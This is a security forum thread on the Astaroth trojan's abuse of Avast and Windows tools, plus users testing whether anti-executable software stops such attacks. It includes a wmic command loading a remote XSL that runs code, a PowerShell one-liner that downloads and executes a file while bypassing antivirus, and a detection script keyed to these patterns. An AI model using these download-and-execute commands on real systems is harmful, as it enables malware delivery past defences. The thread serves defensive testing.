This Trojan exploits antivirus software to steal your data

Andy Ful

From Hard_Configurator Tools
Update February 13 2019 20:00 EST:...
One important thing to consider is that this is neither an injection nor a privilege escalation.
Installed Avast binaries have self-protection mechanisms in place to avoid injections. In this instance, they are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. ...
The above Avast explanation is not exactly true. It is true for the first DLL payload (lrdsnhrxxxfery64), but the next payload (lrdsnhrxxxfery98) is injected into aswrundll.exe. The truth is that aswrundll.exe is a simple tool to run DLLs; it is not installed and protected by Avast, and it does not have any self-protection mechanism either.
It is also true that Avast introduced a new attack vector, similar to rundll32.exe.

Edit.
To be honest, that does not matter at all for the average Avast customer. Such an attack vector is only harder for a more advanced user to uncover.
 

legendcampos

As I said earlier, in my country millions of Brazilians receive these malicious emails. Usually they already fall into the spam filter, but in some cases they do not. The email arrives in the form of a bill or an account cancellation. In the example in the image I have no account at Bank Santander and yet I received it; the second image is the VirusTotal test of the link, and the only antivirus that detected it was Kaspersky.
[Two attached images: the phishing email and the scan result; caption: Vírus Total]
 

Moonhorse

Malwarebytes blocked it (extension) and I can't even connect to that site; probably Netcraft is blocking it as well.
 

ForgottenSeer 72227

The problem with Windows Defender is that it is easy to turn off, not that it is easy to abuse. I would rather have an AV that is turned off than an AV that is being used as a weapon against me.
I agree! Thankfully, with the next major release of W10 they are adding tamper protection, so this issue may be resolved in the near future. :)
 

Andy Ful

Yes the tamper protection will be great addition. The detection rates are good. The average user will be happy.
That will be important, especially in organizations and enterprises. WD Advanced Threat Protection (Exploit Guard, AppLocker, Credential Guard, etc.) is prepared to fight/mitigate malware with Administrator rights. It is logical that this should also be extended to protect the WD settings.

Home users do not have such protection in Windows Home or Pro. If the malware managed to elevate, then with or without Tamper Protection the user is already heavily infected. :(
 

Andy Ful

I was curious whether wmic.exe, which is related to the WMI service (winmgmt), can be blocked by a firewall rule. It is somewhat similar to bitsadmin.exe, which is related to the BITS service.
I used the known testing command line from LOLBins:
Code:
wmic process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
I had to turn off WD real-time protection, because WD blocked that command line.
The Wmic_calc.xsl code runs calculator.exe:
Code:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]> </ms:script>
</stylesheet>
I confirmed that in this case the firewall block rule works well. The difference can be seen with the NirSoft TcpLogView tool. In the case of downloading by bitsadmin, there is no bitsadmin process visible, only svchost.exe. In the case of wmic, the wmic.exe process is present.
 

Wraith

Child processes of what? :unsure:
This malware does not run any installed application, but directly executes wmic.exe when the user clicks on the shortcut.
Does this mean that standard anti-executables like Exe Radar Pro, Voodoo Shield, AppGuard can be bypassed?
 

Andy Ful

That will depend on the configuration. Any anti-exe security can stop that malware if it can alert the user on execution of wmic.exe. The malware can also be mitigated when bitsadmin.exe is alerted. The final injection can be prevented when regsvr32.exe and aswrundll.exe are alerted.

If I remember correctly, wmic.exe is added to Guarded Applications in AppGuard's default settings, but I am not sure if this can stop that malware, because the injection is made into wmic.exe child processes. AppGuard memory protection prevents injections into external processes. That malware is spying software and a password stealer; it does not change the system.
But adding wmic.exe to the User Space (recommended) will stop that malware, for sure.
 

Wraith

It is sufficient for this malware and some more. But WD ASR can possibly be bypassed on Windows Home and Pro by PowerShell, for example:
Code:
powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath
Create the shortcut with this command and click the shortcut. It should download and execute the known, legal and useful SUMo installer. This should also bypass most AVs (anti-script modules).
The SUMo webpage:
Today I was trying out this shortcut since I had some free time, and the results were impressive. Firstly, it went right past the ESET HIPS (block execution of bitsadmin) and Firewall Module (deny network connection for bitsadmin).
Secondly, OSArmor immediately stopped the script with a warning, "block execution of remote downloaded scripts" or something like that, and the script was unable to download anything.
Thirdly, AppGuard showed me a warning when executing the script, but the script still managed to download SUMo, which was blocked by AppGuard on execution.
While these are not true tests, in this scenario the best protection is offered by OSArmor since it prevented the script from downloading remotely. AppGuard comes second since it blocked the execution of the final payload (in this case the installer). But since Astaroth does not execute in this manner, I don't know if the final payload would have been blocked by AppGuard.
@Andy Ful thanks a lot for this since I have learnt a lot about LOLBins. I have H_C on my Win 10 laptop and it's just an absolutely amazing piece of software. :)
 
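A detection-side counterpart to the wmic /format and BITS/WMI command lines discussed in this thread (Andy Ful's wmic firewall test and the PowerShell Start-BitsTransfer example above), added here as an example and not taken from the thread or from any product: it scans constructed Sysmon-style process-creation records for those LOLBin patterns on the command line, which is where they remain visible even when the network side hides behind svchost.exe. The Image/CommandLine field names, the sample records and the example.invalid host are all constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (Image + CommandLine); not real telemetry.
# The host example.invalid is a placeholder, not an indicator from the thread.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process get brief /format:"https://example.invalid/Wmic_calc.xsl"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download https://example.invalid/a.exe C:\Users\u\a.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Import-Module bitstransfer;Start-BitsTransfer 'https://example.invalid/x.exe' "
                    r"$home\Downloads\x.exe;Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic os get caption"},  # benign admin use; must not fire
]

# One rule per LOLBin pattern from the thread. Rules key on the command line because the
# network side is unreliable: a BITS download is seen under svchost.exe, not bitsadmin.exe,
# so a per-program firewall rule on bitsadmin.exe misses it (wmic.exe does connect itself).
RULES = [
    ("wmic_remote_xsl", re.compile(r'\bwmic(\.exe)?\b.*?/format:\s*"?https?://', re.I)),
    ("bitsadmin_download", re.compile(r"\bbitsadmin(\.exe)?\b.*?https?://", re.I)),
    ("powershell_start_bitstransfer", re.compile(r"\bStart-BitsTransfer\b", re.I)),
    ("wmi_win32_process_create", re.compile(r"Invoke-WmiMethod.*?win32_process.*?\bCreate\b", re.I)),
]

# Remote sources referenced on the command line, for blocking or investigation.
URL_RX = re.compile(r"https?://[^\s'\"]+", re.I)


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one hit per event whose CommandLine matches at least one rule."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        matched = [name for name, rx in RULES if rx.search(cmd)]
        if matched:
            hits.append({"Image": ev.get("Image", ""),
                         "rules": matched,
                         "urls": URL_RX.findall(cmd)})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["Image"], hit["rules"], hit["urls"])
```

The same rules apply unchanged to real Sysmon Event ID 1 exports once the records are mapped to the Image/CommandLine keys.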

shmu26

Most AppGuard users tweak the default config in order to improve the PowerShell protection and general script protection. The default config is kind of wishy-washy; it is designed as a generic config that won't aggravate the IT guys running business networks that need to run VBS scripts and stuff like that.

As for bypassing ESET HIPS, it looks like hacker Andy :) didn't invoke bitsadmin, he went straight for the jugular with the BITS downloader.
 

Wraith

While I didn't customise AG too much, I did add PowerShell to Guarded Applications and added cscript, wscript and mshta to User Space.
 

shmu26

cscript, wscript to User Space -- this is correct. You can do even better than that by adding *script.exe to User Space. Of course, make sure you selected User Space: YES.

Adding PowerShell to Guarded Applications is wishy-washy. That's why you got the results you did. The strong way to do it is to add *powershell* to User Space: YES and also to remove PowerShell from guarded apps. You can just untick it; you don't have to delete it.
If you skip this second step, PowerShell will run, but it will run guarded. In this case, it can do limited damage.
 
